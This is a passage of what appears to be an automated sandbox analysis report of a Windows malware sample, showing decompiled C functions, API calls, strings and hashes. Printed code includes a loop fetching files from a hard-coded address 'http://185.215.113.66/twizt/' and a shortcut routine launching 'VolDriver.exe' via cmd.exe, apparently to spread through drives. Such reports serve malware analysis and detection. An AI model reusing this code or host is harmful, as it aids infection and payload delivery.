                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                  				return _a4;
                                                                                  			}
                                                                                  0x00407ccd
                                                                                  0x00407cde
                                                                                  0x00407ce7
                                                                                  0x00407cea
                                                                                  0x00407d00
                                                                                  0x00407d1c
                                                                                  0x00407d25
                                                                                  0x00407d28
                                                                                  0x00407d3e
                                                                                  0x00407d5a
                                                                                  0x00407d63
                                                                                  0x00407d66
                                                                                  0x00407d72

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8);
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8);
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28);
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0);
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0);
                                                                                  				}
                                                                                  			}
                                                                                  0x00405909
                                                                                  0x00405912
                                                                                  0x00405915
                                                                                  0x00405918
                                                                                  0x0040591b
                                                                                  0x0040591e
                                                                                  0x00405921
                                                                                  0x00405924
                                                                                  0x00405927
                                                                                  0x0040592a
                                                                                  0x0040592d
                                                                                  0x00405937
                                                                                  0x00405941
                                                                                  0x0040594b
                                                                                  0x00405955
                                                                                  0x0040595f
                                                                                  0x00405969
                                                                                  0x0040596e
                                                                                  0x00405974
                                                                                  0x0040598f
                                                                                  0x0040599d
                                                                                  0x004059b0
                                                                                  0x004059b1
                                                                                  0x004059c2
                                                                                  0x004059dd
                                                                                  0x004059e2
                                                                                  0x004059eb
                                                                                  0x004059f6
                                                                                  0x004059fb
                                                                                  0x004059fb
                                                                                  0x00405989
                                                                                  0x00405989
                                                                                  0x00405a05
                                                                                  0x00405a05

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                  			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				short _v540;
                                                                                  				char* _t37;
                                                                                  				intOrPtr _t42;
                                                                                  
                                                                                  				__imp__CoInitialize(0);
                                                                                  				_t37 =  &_v12;
                                                                                  				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);
                                                                                  				_v8 = _t37;
                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                  					_t42 =  *_v12;
                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);
                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  					}
                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(C:\Users\user\Desktop\Id4zlrsrZ4.exe), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Strings
                                                                                  • C:\Users\user\Desktop\Id4zlrsrZ4.exe, xrefs: 004057BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID: C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                  • API String ID: 459949847-3281004777
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				signed int _t65;
                                                                                  
                                                                                  				if( *0x414e84 == 0) {
                                                                                  					return __eax;
                                                                                  				}
                                                                                  				_t36 =  *0x414e84; // 0x0
                                                                                  				_v12 = _t36 << 3;
                                                                                  				_t38 = E00408E60(_v12);
                                                                                  				_v8 = _t38;
                                                                                  				__eflags = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v20 = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _v20 -  *0x414e84; // 0x0
                                                                                  						if(__eflags >= 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                  						_t65 = _v20 + 1;
                                                                                  						__eflags = _t65;
                                                                                  						_v20 = _t65;
                                                                                  					}
                                                                                  					_v16 = CreateFileW(0x414c40, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                  					if(_v16 != 0xffffffff) {
                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                  						FlushFileBuffers(_v16);
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					InterlockedExchange(0x4133b4, 0x3d);
                                                                                  					return E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _t38;
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00414C40,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442028454-0
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                  				return _v12;
                                                                                  			}





                                                                                  0x004078bb
                                                                                  0x004078be
                                                                                  0x004078ca
                                                                                  0x004078cd
                                                                                  0x004078d9
                                                                                  0x004078dc
                                                                                  0x004078e8
                                                                                  0x004078eb
                                                                                  0x004078f7
                                                                                  0x004078fa
                                                                                  0x00407906
                                                                                  0x0040790b
                                                                                  0x0040790e
                                                                                  0x0040791c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t18 = __ebx;
                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                  					if(_t26 == 0) {
                                                                                  						L6:
                                                                                  						E00409940( *((intOrPtr*)(_t18 + 8)));
                                                                                  						return E00408FB0(_t18);
                                                                                  					}
                                                                                  					do {
                                                                                  						E00408FB0( *((intOrPtr*)(_t26 + 0x18)));
                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                  						E00408FB0(_t26);
                                                                                  						_t28 = _t28 + 8;
                                                                                  						_t26 = _t23;
                                                                                  					} while (_t23 != 0);
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				return _t8;
                                                                                  			}








                                                                                  0x0040e0a0
                                                                                  0x0040e0a2
                                                                                  0x0040e0b1
                                                                                  0x0040e0bd
                                                                                  0x0040e0c7
                                                                                  0x0040e0cd
                                                                                  0x0040e0d2
                                                                                  0x0040e0f1
                                                                                  0x0040e0f5
                                                                                  0x00000000
                                                                                  0x0040e103
                                                                                  0x0040e0d5
                                                                                  0x0040e0d9
                                                                                  0x0040e0de
                                                                                  0x0040e0e2
                                                                                  0x0040e0e7
                                                                                  0x0040e0ea
                                                                                  0x0040e0ec
                                                                                  0x00000000
                                                                                  0x0040e0f0
                                                                                  0x0040e104

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				intOrPtr _v1056;
                                                                                  
                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                  				_v1056 = _v8;
                                                                                  				if(_v1056 >= 2) {
                                                                                  					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                  						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}






                                                                                  0x004047f3
                                                                                  0x004047f9
                                                                                  0x00404806
                                                                                  0x0040480f
                                                                                  0x00404834
                                                                                  0x0040484e
                                                                                  0x0040484e
                                                                                  0x00404834
                                                                                  0x0040480f
                                                                                  0x0040485b

                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNEL32(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNEL32(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
